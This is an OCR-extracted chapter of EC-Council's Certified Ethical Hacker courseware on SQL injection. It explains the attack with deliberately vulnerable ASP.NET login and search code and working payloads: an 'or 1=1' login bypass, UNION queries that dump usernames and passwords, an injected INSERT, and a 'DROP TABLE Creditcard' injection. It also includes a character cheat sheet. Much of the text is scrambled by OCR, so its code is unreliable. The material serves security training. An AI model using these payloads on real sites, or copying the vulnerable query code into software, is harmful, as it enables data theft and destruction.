Beruflich Dokumente
Kultur Dokumente
Module 14
SQL Injection
IV/lnrlnlo 1A
E t h ic a l H a c k i n g a n d C o u n t e r m e a s u r e s V8
M o d u l e 1 4 : S Q L I n je c t io n E x a m 3 1 2 -5 0
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Security News
Barclays: 97 Percent of Data Breaches Still due to S Q L Injection SQ L injection attacks have been around for m ore than ten years, an d security professionals are m ore than capable of protecting ag ain st them ; yet 9 7 percent of data breaches worldwide are still due to an SQ L injection som ew here along the lin e, according to N eira Jones, head of paym ent security for Barclaycard. Speaking at the Infosecurity Europe Press Conference in London this w eek, Jones said that hackers are taking advantage of businesses with inadequate an d often outdated inform ation security practices. C itin g the m ost recent fig u res fromthe N ational Fraud A uthority, she said that identity fraud co sts the U Km ore than 2 .7 b illio n every year, and affects m ore than 1 .8 m illio n people. "Data breaches have becom e a statistical certainty," saidJones. "If you look at w hat the p u b lic individ ual is concerned about, protecting personal inform ation isactually at the sam e level inthe scale of p ub lic social concerns as preventing crim e."
http://news.techworld.com
Copyright b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.
S e c u rity N ew s
Neuis B a r c l a y s : 97 P e r c e n t o f D a t a B r e a c h e s S t i l l D u e t o S Q L In je c tio n Source: http://news.techworld.com SQL injection attacks have been around for more than ten years, and security professionals are more than capable of protecting against them; yet 97 percent of data breaches worldwide are still due to an SQL injection somewhere along the line, according to Neira Jones, head of payment security for Barclaycard. Speaking at the Infosecurity Europe Press Conference in London this week, Jones said that hackers are taking advantage of businesses with inadequate and often outdated information security practices. Citing the most recent figures from the National Fraud Authority, she said that identity fraud costs the UK more than 2.7 billion every year, and affects more than 1.8 million people. "Data breaches have become a statistical certainty," said Jones. "If you look at what the public individual is concerned about, protecting personal information is actually at the same level in the scale of public social concerns as preventing crime."
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
SQL injection is a code injection technique that exploits security vulnerability in a website's software. Arbitrary data is inserted into a string of code that is eventually executed by a database. The result is that the attacker can execute arbitrary SQL queries or commands on the backend database server through the web application. In October
2011,
platform. This caused the visitor's browser to load an iframe with one of two remote sites. From there, the iframe attempted to plant malware on the visitor's PC via a number of browser drive-by exploits. Microsoft has been offering ASP.Net programmers information on how to protect against SQL injection attacks since at least 2005. However, the attack still managed to affect around 180,000 pages. Jones said that, with the number of interconnected devices on the planet set to exceed the number of humans by 2015, cybercrime and data protection need to take higher priority on the board's agenda. In order for this to happen, however, the Chief Information Security Officer (CISO) needs to assess the level of risk within their organisation, and take one step at a time. "I always say, if anyone says APT [advanced persistent threat] in the room, an angel dies in heaven, because APTs are not the problem," said Jones. "I'm not saying that they're not real, but let's fix the basics first. Are organisations completely certain they're not vulnerable to SQL injections? And have they coded their web application securely?" Generally it takes between 6 and 8 months for an organisation to find out it has been breached, Jones added. However, by understanding their risk profile and taking simple proactive measures, such as threat scenario modelling, companies could prevent 87 percent of attacks.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M odule Objectives
J SQL Injection J J J SQL Injection Attacks SQL Injection Detection SQL Injection Attack Characters J J J J J J J Password Grabbing
CEH
Bypass Website Logins Using SQL Injection Network Reconnaissance Using SQL Injection SQL Injection Tools Evasion Technique How to Defend Against SQL Injection Attacks SQL Injection Detection Tools
J Testing for SQL Injection J Types of SQL Injection J J Blind SQL Injection SQL Injection Methodology
M o d u le O b je c tiv e s
This module introduces you the concept of SQL injection and how an attacker can exploit this attack methodology on the Internet. At the end of this module, you will be familiar with: e e e Q 0 e e e SQL Injection SQL Injection Attacks SQL Injection Detection SQL Injection Attack Characters Testing for SQL Injection Types of SQL Injection Blind SQL Injection SQL Injection Methodology s Q Q e e e Q Advanced SQL Injection Bypass Website Logins Using SQL Injection Password Grabbing Network Reconnaissance Using SQL Injection SQL Injection Tools Evasion Technique How to Defend Against SQL Injection Attacks SQL Injection Detection Tools
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
I i
M o d u le F lo w
To understand SQL injection and its impact on the network or system, let us begin
with the basic concepts of SQL injection. SQL injection is a type of code injection method that exploits the safety vulnerabilities that occur in the database layer of an application. The vulnerabilities mostly occur due to the wrongly filtered input for string literal escape characters embedded in SQL statements from the users or user input that is not strongly typed and then suddenly executed without correcting the errors.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Evasion Techniques
) :^
Countermeasures
This section introduces you to SQL injection and the threats and attacks associated with it.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
SQL Injection
cs
SQ L
SQL In je c tio n
SQL injection is a type of web application vulnerability where an attacker can
manipulate and submit a SQL command to retrieve the database information. This type of attack mostly occurs when a web application executes by using the user-provided data without validating or encoding it. It can give access to sensitive information such as social security numbers, credit card numbers, or other financial data to the attacker and allows an attacker to create, read, update, alter, or delete data stored in the backend database. It is a flaw in web applications and not a database or web server issue. Most programmers are still not aware of this threat.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Scenario
v o la tility s u b d u e d
v rt \3 .Q \ u 1j .
Albert Gonzalez, an indicted hacker stole 130 million credit and debit cards, the biggest identity theft case ever prosecuted in the United States. He used SQL injection attacks to install sniffer software on the companies' servers to intercept credit card data as it was being processed.
http ://www. theregister.co. uk
pro**
1 ^ B u s i n e s s w o r l d
0
.
m l s t i c
p 1
nomic upturn
lid a s s e t s
S c e n a rio
Albert Gonzalez, an indicted hacker stole 130 million credit and debit cards,
performed the biggest identity theft case ever prosecuted in the United States. He used SQL injection attacks to install sniffer software on companies' servers to intercept credit card data as it was being processed.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
D efacem ent Targeted Attack DNS Hijack Password Cracking Account Hijacking
Java Vulnerability
Other
http://hackmageddon.com
Copyright b y
EG-G*ancil. All
Source: http://hackmageddon.com According to http://hackmageddon.com. SQL injection is the most commonly used attack by the attacker to break the security of a web application. From the following statistics that were recorded in September 2012, it is clear that, SQL injection is the most serious and mostly used type of cyber-attack performed these days when compared to other attacks.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
SQL Injection Unknown DDoS Defacement Targeted Attack DNS Hijack Password C racking Account Hijacking Java Vulnerability Other
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
U rtifM
CEH
IthKJl lUckM
O Spoofing Identity
D estruction of D ata
y
9
SQL In je c tio n T h re a ts
The following are the major threats of SQL injection:
Spoofing identity: Identity spoofing is a method followed by attackers. Here people are
deceived into believing that a particular email or website has originated from the source which actually is not true.
Changing prices: One more of problem related to SQL injection is it can be used to
modify data. Here the attackers enter into an online shopping portal and change the prices of product and then purchase the products at cheaper rates. Q
Tamper with database records: The main data is completely damaged with data
alteration; there is even the possibility of completely replacing the data or even deleting the data.
Escalation of privileges: Once the system is hacked, the attacker seeks the high
privileges used by administrative members and gains complete access to the system as well as the network.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Complete disclosure of all the data on the system: Once the network is hacked the
crucial and highly confidential data like credit card numbers, employee details, financial records, etc. are disclosed.
Destruction of data: The attacker, after gaining complete control over the system,
completely destroys the data, resulting in huge losses for the company.
Voiding system's critical transaction: An attacker can operate the system and can halt
all the crucial transactions performed by the system. 0
Modifying the records: Attackers can modify the records of the company, which proves
to be a major setback for the company's database management system.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database SQL injection is a basic attack used to either gain unauthorized access to a database or to retrieve information directly from the database
SOL
W h a t Is SQL In je c tio n ?
Structured Query Language (SQL) is basically a textual language that enables interaction with a database server. SQL commands such as INSERT, RETRIEVE, UPDATE, and DELETE are used to perform operations on the database. Programmers use these commands to manipulate data in the database server. SQL injection is defined as a technique that takes advantage of non-validated back-end database. Programmers use sequential SQL commands with input
vulnerabilities and injects SQL commands through a web application that are executed in a client-supplied parameters making it easier for attackers to inject commands. Attackers can easily execute random SQL queries on the database server through a web application. Attackers use this technique to either gain unauthorized access to a database or to retrieve information directly from the database.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
J On the basis of application used and the way it processes user supplied data, SQL injection can be used to implement the attacks mentioned below:
A u th e n tic a tio n B y p a s s
U sin gth is attack, an attacker lo g sonto anap p lication w ithout p ro vid in gvalid u ser nam e an dp assw o rd an dg ain s ad m inistrative p rivileg es
R e m o te C o d e E x e c u t io n In fo r m a t io n D is c lo s u r e
U sin gth is attack, anattacker o b tain s sen sitive inform ation that issto red inthe d atab ase
C o m p r o m is e d A v a ila b ilit y o f D a ta
C o m p r o m is e d D a ta In t e g r it y
A ttackers u seth is attacktodelete the d atabase in form ation , delete lo g , or au d it in form ation that is sto red ina d atab ase
A n attacker u sesth is attackto d eface a w eb p ag e , in sert m aliciouscontent in to w eb p ag es, or alter the contents of a d atab ase
/Copyright b y EG-CMMCil. All Rights JteSeivecL R ep ro d u ctio n is Strictly Prohibited.
network without
providing any authentic user name or password and could gain the access over the
Q Information disclosure: After unauthorized entry into the network, access to the sensitive data stored in the database. Q
Compromised data integrity: The attacker changes the main content of the website and
also enters malicious content into it.
Compromised availability of data: The attacker uses this type of attack to delete the
data related to audit information or any other crucial database information.
Remote code execution: An attacker could modify, delete, or create data or even can
create new accounts with full user rights on the servers that share files and folders. It allows an attacker to compromise the host operating system.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Internet
Firew all
W e b S erver
OS System Calls
Operating System
DBM S
W e b A pplication
ID
6329
Topic
Tech CNN O utput SELECT * from news where id = 6329
Copyright b y
EC-ClUIICil. All
Step 1: The user requests through the web browser from the Internet to the web server. Step 2: The W eb Server accepts the request and forwards the request sent by the user to the
applicable web application server.
Step 3: The web application server performs the requested task. Step 4: The web applications accesses the entire database available and responds to the web
server.
Step 5: The web server responds back to the user as the transaction is complete. Step 6: Finally the information that the user requested appears on the monitor of the user.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
ID
6329
Topic
Tech
New s
CNN SELECT * from news where id = 6329
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Server-side Technologies
Powerful server-side technologies like ASP.NET and database servers allow developers to create dynam ic, data-driven websites with incredible ease
CEH
The power of ASP.NETand SQL can easily be exploited by hackers using SQL injection attacks
SQL
Server
A ll relational databases,SQLServer, Oracle, IBM D B2, and MySQL, are susceptible to SQL-injection attacks
SQ L injection attacks do not exploit a specific softw are vulnerability, instead they target websites that do not follow secure coding practices for accessing and m anipulating data stored in a relational database
Copyright b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
S e rv e r-sid e T e c h n o lo g ie s
This technology is used on the server side for client/server technology. For achieving business success, not only information is important, but we also need speed and efficiency. Server-side technology helps us to smoothly access, deliver, store, and restore information. Various server-side technologies include: ASP, ASP.Net, Cold Fusion, JSP, PHP, Python, and Ruby on Rails. Server side technologies like ASP.NET and SQL can be easily exploited by using SQL injections. Q Powerful server-side technologies like ASP.NET and database servers allow developers to create dynamic, data-driven websites with incredible ease. Q All relational databases, SQL Server, Oracle, IBM DB2, and MySQL, are susceptible to SQL injection attacks. e SQL injection attacks do not exploit a specific software vulnerability; instead they target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. The power of ASP.NET and SQL can easily be exploited by attackers using SQL injection attacks.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Account Login
Usern am e Password
^ b art
simp!
W h e n a user provides inform ation and clicks Subm it, th e brow ser subm its a string to th e w eb server th at contains the user's credentials This string is visible in th e body of the HTTP or HTTPS POST request as:
SQL query at the database select * from Users where (username = 1 b a r t 1 and password = simpson1);
<form action-"/cgi-bin/login me thod-pos t> Username: <input type-text name-username> Password: <input type=password name=password> <input type=submit value=Login>
a........... .............. ................ .......................... ..
Copyright b y
EG-G*ancil. All
Ethical Hacking and Countermeasures Copyright by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
s trin g
s trC n x
jy B o y .c o m
/ / T h is
code
is
s u s c e p t ib le
to
SQ L
in je c t io n
a tta c k s .
string strQry = "SELECT Count(*) FROM Users W HERE U s e r N a m e "' + t x t U ser.Text + " AND Password " + txtPasswo r d . T e x t +
in t
S q lC o m m a n d
Web Browser
C onstructed SQ L Q u e ry <
in t R e c s i f
cm d.E x e c u t e S c a la r ( ) ;
(in t R e c s > 0 ) f a ls e );
F o r m s A u t h e n t ic a t io n .R e d ir e c tF r o m L o g in P a g e (tx tU s e r .T e x t,
lb lM s g .T e x t c n x .C lo s e ( ) ;
L o g in
>
E x a m p l e 1: N o r m a l S Q L Q u e r y
Here the term "query" is used for the commands. All the SQL code is written in the form of a query statement and finally executed. Various data operations of the SQL queries include selection of the data, inserting/updating of the data, or creating data objects like databases and tables with SQL. All the query statements begin with a clause such as SELECT, UPDATE, CREATE, and DELETE. SQL Query Examples:
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
J u g g y B o y .c o m
b o d L o g rn . a c p x . ce p r i v a t e v o i d c m d L o g 1 n _ C 1 1 c k (o b je c t s e n d e r , S y s te n .E v e n tA r g s e) < s t r i n g s trC n x = s e r v o r= lo c A l h o s t ; d a t a b a a o n o r t h H 1 n d ;u i d - s a ?p w d - ; " ; S q l C o n n e c t io n c n x = new S q l C o n n e c t i o n ( s t r C n x ) ; c n x . Open ( ) ; / / T h is cod e i s a tta c k s . s trin g U se rs " AND s trQ ry W HERE s u s c a p t ib le = to SQ L i n j e c t i o n C o u n t ( * ) + FRO M
+ +
SELEC T
U se rN a m e = ' +
tx tU s e r.T e x t
P a s s w o r d * '"
tx tP a s s w o rd . T e x t
W eb Brow ser
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
jy B o y .c o m
SELECT Count(*) FR O M Users W H ERE UserNam e=1 Blah' or 1 = 1 --1 A N D Password='Springfield1 SELECT Count(*) FR O M Users W H ERE UserNam e=Blah' or 1 = 1
SQL Query Executed
E x a m p l e 1: S Q L I n j e c t i o n Q u e r y
The most common operation in SQL is the query, and it is performed with the declarative SELECT statement. This SELECT command retrieves the data from one or more tables. SQL queries allows a user to describe or assign the desired data, and leave the DBMS (Data Base Management System) as responsible for optimizing, planning, and performing the physical operations. A SQL query includes a list of columns to be included in the final result of the SELECT keyword. If the information submitted by a browser to a web application is inserted into a database query without being properly checked, then there may be a chance of occurrence of SQL injection. HTML form that receives and passes the information posted by the user to the Active Server Pages (ASP) script running on IIS web server is the best example of SQL injection. The information passed is the user name and password. By querying a SQL server database these two data items are checked. username B la h ' o r 1=1 password S p r in g f ie ld The query executed is: SELECT C o u n t(*) FROM U sers Password ' S p r i n g f i e l d 1; WHERE UserName=' B la h ' or 1=1 -AND
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
However, the ASP script builds the query from user data using the following line: B la h query = 1 1 SELECT * FROM u sers WHERE username = 1" + B la h 1 or 1=1 + ' AND password = + S p r in g f ie ld + If the user name is a single-quote character (') the effective query becomes: SELECT * FROM ' [S p r in g fie ld ]'; s e rs WHERE username = 111 AND password =
This is invalid SQL syntax and produces a SQL server error message in the user's browser: M ic r o s o ft OLE DB P r o v id e r f o r ODBC D r iv e r s e r r o r '80040el4'
[M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L S e rv e r]U n c lo s e d q u o ta tio n mark b e fo re the c h a r a c te r s t r in g / lo g in .a s p , l i n e 16 The quotation mark provided by the user has closed the first one, and the second generates an error, because it is unclosed. At this instance, to customize the behavior of a query, an attacker can begin injecting strings into it. The content proceeding the double hyphes (--) signify a Transact-SQL comment. 0 ' and p assw ord = ''.
13
^
nttp://|usfivt>0Y com/Badiofiin.aspx
B o y .c o m
SELECT Count(*)
FROM Users WHERE UserName B l a h ' or 1"1 --' AND Password' Springfield'
SQ L Q u e ry Executed
Code after
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
string strQry = "SELECT Count(*) FROM Users WHERE U s e r N a m e "' + txtUser.Text + AND Password" + t x t P a s s w o r d .Text + . .;
E x a m p l e 1: C o d e A n a l y s i s
Code analysis is the process of automated testing of the source code for the purpose of debugging before the final release of the software for the purpose of sale or distribution. a A user enters a user name and password that matches a record in the Users table A dynamically generated SQL query is used to retrieve the number of matching rows
The user is then authenticated and redirected to the requested page W hen the attacker enters blah' or 1=1 - then the SQL query can look like: SELECT Count Password' ' (*) FROM U sers WHERE UserName=' b l a h ' Or 1=1 ' AND
Because a pair of hyphens designates the beginning of a comment in SQL, the query simply becomes: SELECT Count (*) FROM U sers WHERE UserName=' b la h ' Or 1=1 UserName='" +
s t r in g s trQ ry = "SELECT C o u n t(*) FROM U sers WHERE tx tU s e r .T e x t + 1 1 ' AND Passw ord= '" + tx tP a s s w o rd . Text +
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Example 2: BadProductList.aspx
CEH
GO
p r iv a te v o id
http://juggyboy.com/BadProductList.aspx
from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter
c m d F ilt e r _ C lic }c (o b je c t
sen d e r.
S y s te m .E v e n tA r g s
e)
d g r P r o d u c t s . C u r re n tP a g e ln d e x b in d D a ta G r id ( ) ; }
= 0;
p r i v a t e v o id b in d D a t a G r id () { d g rP ro d u c ts .D a ta S o u rc e = c r e a t e D a t a V ie w (); d g r P r o d u c ts .D a ta B in d ( ) ; p r iv a te D a t a V ie w ) {
c re a te D a ta V ie w ()
s t r in g s trC n x = " s e r v e r l o c a l h o s t ; u id = s a ;p w d = ; d a ta b a s e n o r t h w in d ; " ; s trin g s trS Q L "S E L E C T P r o d u c t ld , P ro d u c tN a m e , " "Q u a n tity P e r U n it , / / T h is i f code is + U n it P r ic e to FROM P r o d u c t s " ; SQ L i n j e c t i o n > 0) { L IK E + t x t F i l t e r .T e x t a tta c k s .
Lik e the previous exam ple (BadLogin.aspx), this code isvulnerable to SQ L injection attacks < ; The executed SQ L is constructed dynam ically froma u ser-su p p lied in p u t
s u s c e p t ib le W H ERE
( t x t F i l t e r .T e x t . L e n g th 8 trS Q L
P ro d u c tN a m e
S q lC o n n e c t io n
cnx
n e w S q l C o n n e c t i o n ( s t r C n x ) ; c n x );
Copyright b y
EG-Giancil. All
E x a m p l e 2: B a d P r o d u c t L i s t . a s p x
Source: http://msdn.microsoft.com This page displays products from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter. Like the last example, the page is ripe for SQL injection attacks because the executed SQL is constructed dynamically from a userentered value. This particular page is a hacker's paradise because it can be hijacked by the astute hacker to reveal secret information, change data in the database, damage the database records, and even create new database user accounts. Most SQL-compliant databases including SQL Server, store metadata in a series of system tables with the names sysobjects, syscolumns, sysindexes, and so. This means that a hacker could use the system tables to ascertain schema information for a database to assist in the further compromise of the database. For example, the following text entered into the txtFilter textbox might be used to reveal the names of the user tables in the database: UNION SELECT id , name, 0 FROM s y s o b je c ts WHERE xtype = 'U ' --
The UNION statement in particular is useful to a hacker because it allows him or her to splice the results of one query onto another. In this case, the hacker has spliced the names of the user tables in the database to the original query of the Products table. The only trick is to match the number and data types of the columns to the original query. The previous query might reveal
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
that a table named Users exists in the database. A second query could reveal the columns in the Users table. Using this information, the hacker might enter the following into the txtFilter textbox: UNION SELECT 0, UserName, Password, 0 FROM U sers -Entering this query reveals the user names and passwords found in the Users table.
p r i v a t e v o id c m d r i lt e r _ c l ic k ( 0b j e c t s e n d e r, S y ste a .E v e n tA rg s e) d g rP ro d u c ts . C u rren tP ag eIn d ex = 0; b in d O a t a O r id () ; ) p r iv a t e v o id b in d O a ta O rid () ( d g rP ro d u c ts . D ataSource = c r e a te D a ta V ie w (); d g rP ro d u c ts . D a ta B in d ( ) ; ) p r i v a t e D ataV iew c re a te D a ta V ie w () ( s t r in g strC n x = " s e r v e r =lo c a lh o s t ;u id = s a , pwd= datab a se=n o rth w ln d ' s t r in g strSQL = "SELECT ProductXd, ProductN ane, H " Q u a n tlty P e r U n lt, U n itP r ic e FROM P r o d u c t s ':
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
UrtfW<
CEH
ItlMui HMkM
SELECT Productld, ProductName, QuantityPerUnit, UnitPrice FRO M Products W HERE ProductName LIKE 'blah' UNION Select 0, username, password, 0 from users
Copyright b y
EG-C0uacil. All
E x a m p l e 2: A t t a c k A n a l y s i s
Any website has a search bar for the users to search for data and if the search bar can't find the vulnerabilities in the data entered, then it can be used by attackers to create vulnerabilities to attack. W hen you enter the value into the search box as: blah UNION Select 0, username, password, 0 from users. SQL Query Executed:
SELECT ProductID, ProductName LIKE ProductName, QuantityPerUnit, UnitPrice 'blah' UNION SELECT 0, FROM Products 0 FROM USERS WHERE -username, password,
After executing the SQL query it shows results with the user names and passwords.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
SQL Injection
http://|uggyboyshop com
Ju g g y B o y S h o p .c o m
>
E x a m p l e 3: U p d a t i n g T a b l e
To create the UPDATE command in the SQL query the syntax is: UPDATE " table_nam e" SET "co lu m n _l" = [new v a lu e ] WHERE {c o n d itio n } For example, say we currently have a table as follows: Table Store Information Store_Nam e Sydney Melbourne Queensland Victoria Sales $100 $200 $400 $800 Date Aug-06-2012 Aug-07-2012 AUg-08-2012 Aug-09-2012
TABLE 14.1: Store Table And we notice that the sales for Sydney on 08/06/2012 are actually $250 instead of $100, and that particular entry needs to be updated. To do so, we use the following SQL query:
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
UPDATE Store Information SET S a le s = 250 WHERE s to re name = "Sydney" AND Date = "08/06/2012" The resulting table would look like this: Table Store Information Store_Nam e Sydney Melbourne Queensland Victoria Sales $250 $200 $400 $800 Date Aug-06-2012 Aug-07-2012 AUg-08-2012 Aug-09-2012
Ju g g y B o y .c o m Forgot Password
E m a il A d d r e s s
Ml
SQL Injection Vulnerable W ebsite
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
u J f t Fo rg o t P a s s w o rd
1 1
g g y B o y . c o m
Em ail Address Your passw ord will be sent to your registered em ail address
p a s s w d ' , 1j b l o g i n _ i d ' , ' j b l a s t _ n a m e ' ) ( ' ja s o n @ s p r in g f ie ld . com ' , ' h e l l o ', s p r in g f ie ld ') ;
YL
E x a m p l e 4: A d d i n g N e w R e c o r d s
The following example illustrates the process of adding new records to the table: INSERT INTO ta b le name (colum nl, column2, column3. . . ) VALUES ( v a l u e l , v a lu e 2 , v a lu e 3 . . . ) Sto re_N am e Sydney M elbourne Queensland Victoria Sales $250 $200 $400 $800 Date Aug-06-2012 Aug-07-2012 AUg-08-2012 Aug-09-2012
TABLE 14.3: Store Table INSERT INTO table_nam e VALUES ("A d e la id e ", (" s t o r e name", " s a l e s " , "d a t e ")
"$1000","08/10/2012")
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
http://1UHRVboy.com
!'1g g y R 0 y.com
Fo rg o t P a s s w o r d Attacker Launching SQL Injection Email Address
b l a h ' ; INSERT INTO jb - c u s to m e r s ( ' j b - e n a i l ' , b p a s s w d , j b l o g i n _ i d ' , 1j b Ia s t_ n a !B ' ) VA 1XJES a s o n s p r i n g f l e l d . c o r e 1 , , h o l l o ' , ja s o n , ^ a so n s p r in g fie ld ) ;
(3
1 0
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
BBQ
1 1
g g y B o y . c o m
Forgot Password
Em ail Address Your passw ord will be sent to your registered em ail address
blah AND 1=(SELECT COUNT(*) FROM mytable); -You will need to guess table names here
S Q L Q u e ry E x e c u t e d
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FR O M table W H ERE ;jb-email = ,blah' A N D 1=(SELECT COUNT(*) FR O M mytable); ;
Copyright b y
EG-G*ancil. All
f ij
E x a m p l e 5: I d e n t i f y i n g t h e T a b l e N a m e e so
| \ Ju g g y B o y .c o m
Fo rg o t P a s s w o rd
Email Address Your password will be sent to your registered email address
S Q L Q u e ry E x e c u te d SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE jb-email = 'blah' AND !( SELECT COUNT(*) FROM m y t a b l e ) ;
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
1 1
g g y B o y . c o m
Fo rg o t P a s s w o rd
Em ail Address Your passw ord will be sent to your registered em ail address
J
SQL Injection Vulnerable Website
S Q L Q u e ry E x e c u t e d
SELECT jb-email, jb-passwd, jb-login_id, jklast_name FROM members WHERE jb-email = ,blah'; DROP TABLE Creditcard; ';
* E x a m p l e 6: D e l e t i n g a T a b l e
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FRO Mm em bers W HERE jb-email = ,blah'; DRO P TABLE Creditcard; ;
FIGURE 14.10: Deleting Table
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le F lo w
C EH
(rtifwtf ttkujl IUU1
M o d u le F lo w
So far, we have discussed various concepts of SQL injection. Now we will discuss how to
test for SQL injection. SQL injection attacks are attacks on web applications that rely on the databases as their background to handle and produce data. Here attackers modify the web application and try to inject their own SQL commands into those issued by the d a tab a se .!
^*
Evasion Techniques
^ v
Countermeasures
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
This section focuses on SQL injection attack characteristics and their detection.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S T E P 6: Detailed error messages provide a wealth of information to an attacker in order to execute SQL injection
S T E P 1: Check if the web application connects to a Database Server in order to access some data
S T E P 5: The UNION operator is used to combine the result-set of tw o or more SELECT statements
S T E P 2: List all input fields, hidden fields, and post requests whose values could be used in crafting a SQL query
S T E P 4: Try to insert a string value where a number is expected in the input field
Step 1: Check if the web application connects to a Database Server in order to access some data. Step 2: List all input fields, hidden fields, and post requests whose values could be used in crafting a SQL query. Step 3: Attempt to inject codes into the input fields to generate an error. Step 4: Try to insert a string value where a number is expected in the input field. Step 5: The UNION operator is used in SQL injections to join a query to the original query. Step 6: Detailed error messages provide a wealth of information to an attacker in order to execute SQL injection.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Microsoft OLE DB Provider for ODBC Drivers error '80040el4' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string . /shopping/buy. aspx, line 52
[51
Attacker
4C4 1 U
Microsoft OLE DB Provider for ODBC Drivers error '80040607' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'test' to a column of data type int. /visa/credit.aspx, line 17
N ote: If applications do n ot provide detailed e rro r messages and re tu rn a sim ple '500 Server E rror1or a custom e rro r page th e n a tte m p t b lin d in je ctio n techniques
Copyright by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Urtiftetf ttkujl lUckM
?Paraml=foo&Param2=bar
/*.*/
variable \
Global variable
11
%
V Aversion
Function
Character string indicators Single-line comment Multiple-line comment Addition, concatenate (or space in url) (Double pipe) concatenate Wildcard attribute indicator URL Parameters Useful as non-transactional command Local variable Global variable Time delay Displays SQL server version
+ II %
?Paraml=f00&Param2=bar PRINT (variable ((variable waitfor delay '0:0:10' ((version
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
F u n c tio n T e s tin g
s s a
Ex am p le of Functio n Testing
http:://juggyboy/?parameter=123 http:://juggyboy/?param eter=l' http:://juggyboy/?param eter=l'# http:://juggyboy/?param eter=l" http:://juggyboy/?param eter=l AND 1=1http:://juggyboy/?param eter=l'http:://juggyboy/?param eter=l AND 1=2-http:://juggyboy/?param eter=l'/* http:://juggyboy/?param eter=l' AND T = ' l http:://juggyboy/?param eter=l order by 1000
This testing falls within the scope of black box testing, and as such, should require no knowledge of the inner design of the code
V
M e th o d 2
or logic
F u z z in g T e s tin g
It is an adaptive SQL injection testing technique used to discover coding errors by
& a
0 0
V
M e th o d 3
inputting massive amount of random data and observing the changes in the output
S ta tic / D y n a m ic T e s tin g
Analysis of the web application source co11e # 3 1
(&
&
F u n ctio n T estin g
This testing falls within the scope of black box testing, and as such, should require no
F u zzin g T estin g
Fuzzy testing is a SQL injection testing technique used to discover coding errors by inputting a massive amount of data to crash the web application.
S tatic /D y n am ic T estin g
